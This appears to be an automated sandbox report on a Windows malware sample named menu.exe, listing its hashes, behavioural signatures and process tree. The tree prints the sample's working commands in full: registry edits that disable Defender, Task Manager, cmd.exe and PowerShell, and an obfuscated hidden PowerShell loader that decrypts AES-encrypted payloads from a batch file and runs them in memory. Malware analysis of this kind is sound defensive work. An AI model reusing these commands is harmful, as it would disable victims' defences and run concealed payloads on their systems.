Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
125s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18/11/2024, 02:12
Static task
static1
Behavioral task
behavioral1
Sample
menu.exe
Resource
win7-20240903-en
General
-
Target
menu.exe
-
Size
327KB
-
MD5
0f7fea309ccdc6ba53737fb6d88fcfd3
-
SHA1
0f3dfdcbbdb0412cbee95c87a366578da973f07b
-
SHA256
8b777ba206b3be169e56502581528eb3735c758a8e3c8a0f6b4479ddfc92bb78
-
SHA512
f123781d84ad83a885aa0a4916be9b40adb87090eb301cd9afcf652cbbfd4deaac1f91b09b616d360f1bf70dbb430a99f5226b118140e21f02d5df2deaff133e
-
SSDEEP
6144:4PQGXEB3uR4D7P05EkRTwEur5447h/PcHnUSFIT7JHoI0E7YPWs3kZ4sUT:4QapW/PqbTw3FcHUSFU1v0E7v43T
Malware Config
Signatures
-
Blocks application from running via registry modification 3 IoCs
Adds application to list of disallowed applications.
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" reg.exe Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "powershell.exe" reg.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2712 powershell.exe -
Disables Task Manager via registry modification
-
Disables cmd.exe use via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2712 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2712 powershell.exe -
Suspicious use of WriteProcessMemory 42 IoCs
description pid Process procid_target PID 2520 wrote to memory of 1264 2520 menu.exe 30 PID 2520 wrote to memory of 1264 2520 menu.exe 30 PID 2520 wrote to memory of 1264 2520 menu.exe 30 PID 2520 wrote to memory of 2264 2520 menu.exe 32 PID 2520 wrote to memory of 2264 2520 menu.exe 32 PID 2520 wrote to memory of 2264 2520 menu.exe 32 PID 1264 wrote to memory of 2708 1264 cmd.exe 34 PID 1264 wrote to memory of 2708 1264 cmd.exe 34 PID 1264 wrote to memory of 2708 1264 cmd.exe 34 PID 2520 wrote to memory of 2864 2520 menu.exe 36 PID 2520 wrote to memory of 2864 2520 menu.exe 36 PID 2520 wrote to memory of 2864 2520 menu.exe 36 PID 2708 wrote to memory of 2748 2708 net.exe 35 PID 2708 wrote to memory of 2748 2708 net.exe 35 PID 2708 wrote to memory of 2748 2708 net.exe 35 PID 1264 wrote to memory of 2904 1264 cmd.exe 37 PID 1264 wrote to memory of 2904 1264 cmd.exe 37 PID 1264 wrote to memory of 2904 1264 cmd.exe 37 PID 1264 wrote to memory of 2888 1264 cmd.exe 38 PID 1264 wrote to memory of 2888 1264 cmd.exe 38 PID 1264 wrote to memory of 2888 1264 cmd.exe 38 PID 1264 wrote to memory of 3012 1264 cmd.exe 39 PID 1264 wrote to memory of 3012 1264 cmd.exe 39 PID 1264 wrote to memory of 3012 1264 cmd.exe 39 PID 1264 wrote to memory of 2848 1264 cmd.exe 40 PID 1264 wrote to memory of 2848 1264 cmd.exe 40 PID 1264 wrote to memory of 2848 1264 cmd.exe 40 PID 1264 wrote to memory of 2900 1264 cmd.exe 41 PID 1264 wrote to memory of 2900 1264 cmd.exe 41 PID 1264 wrote to memory of 2900 1264 cmd.exe 41 PID 1264 wrote to memory of 2896 1264 cmd.exe 42 PID 1264 wrote to memory of 2896 1264 cmd.exe 42 PID 1264 wrote to memory of 2896 1264 cmd.exe 42 PID 1264 wrote to memory of 2884 1264 cmd.exe 43 PID 1264 wrote to memory of 2884 1264 cmd.exe 43 PID 1264 wrote to memory of 2884 1264 cmd.exe 43 PID 1264 wrote to memory of 2768 1264 cmd.exe 44 PID 1264 wrote to memory of 2768 1264 cmd.exe 44 PID 1264 wrote to memory of 2768 1264 cmd.exe 44 PID 2264 wrote to memory of 2712 2264 cmd.exe 45 PID 2264 wrote to memory of 2712 2264 cmd.exe 45 PID 2264 wrote to memory of 2712 2264 cmd.exe 45
Processes
-
C:\Users\Admin\AppData\Local\Temp\menu.exe"C:\Users\Admin\AppData\Local\Temp\menu.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\load.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1264 -
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:2748
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f3⤵PID:2904
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d 1 /f3⤵
- Disables cmd.exe use via registry modification
PID:2888
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:3012
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDrives" /t REG_DWORD /d 4 /f3⤵PID:2848
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer" /v "DisableMSI" /t REG_DWORD /d 1 /f3⤵PID:2900
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2896
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f3⤵
- Blocks application from running via registry modification
PID:2884
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "powershell.exe" /f3⤵
- Blocks application from running via registry modification
PID:2768
-
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\loader.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IRcHV6wpyUlV7FCq3bjBVC6HnvFYqZVt3VMM1/rthAU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ot9DBajrhd5olnzo/saVIg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DyDjK=New-Object System.IO.MemoryStream(,$param_var); $nXYTA=New-Object System.IO.MemoryStream; $riGTr=New-Object System.IO.Compression.GZipStream($DyDjK, [IO.Compression.CompressionMode]::Decompress); $riGTr.CopyTo($nXYTA); $riGTr.Dispose(); $DyDjK.Dispose(); $nXYTA.Dispose(); $nXYTA.ToArray();}function execute_function($param_var,$param2_var){ $dwlZo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UVtXb=$dwlZo.EntryPoint; $UVtXb.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\loader.bat';$InQWi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\loader.bat').Split([Environment]::NewLine);foreach ($XQbNl in $InQWi) { if ($XQbNl.StartsWith(':: ')) { $WcJMs=$XQbNl.Substring(3); break; }}$payloads_var=[string[]]$WcJMs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\ran.vbs"2⤵PID:2864
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5cf08811b97cdd3d57685a7841a40e2d4
SHA1faefa9b229e81eef5d200799c39b5db5511922d2
SHA2567f27ffda0644c500961f965c6f403f54c41c6df7fb685020cf98f7be6fd5082c
SHA512695e45bc85be611ca90e92ff5502a707e6ec298f31b6113be2537be78beda222d52751f090b0dda752e2880ac08c62c6d80f4fdd371b2721f1c728d9ebd1002a
-
Filesize
291KB
MD5d05f7937bc9eef5bf3042a8a2ecd2f08
SHA115230c5d5506e80ac6cecd06a21bea1a44aeef08
SHA256b981829c3b1026c432c08bc8a65bc1a848750596e01a065bcacef49c128f7226
SHA51242954c12e551ff742ab466b416f805d93632cafab1bd2c825b16dcb4f838d7914e61e84cf46744d081d0e6424a3afd335cd169cf8e9c0b6d83733f45eba71c95
-
Filesize
4KB
MD5be03bd7bd0315142da6482ee8075f97d
SHA144242df82433922b5dae792842d18da1eccac112
SHA256f245b406955a4a335f5eb76ef8e48958c55be9e7e667545e95602440c64ee9ae
SHA51255230398878d8cbca4b14a93b9e5cae00790f845140f28c9c82c622e7bc53eb4c9875de281eb3ba280478cbecbe56eb6a1720832e9afc6607daeafb83f83e7e9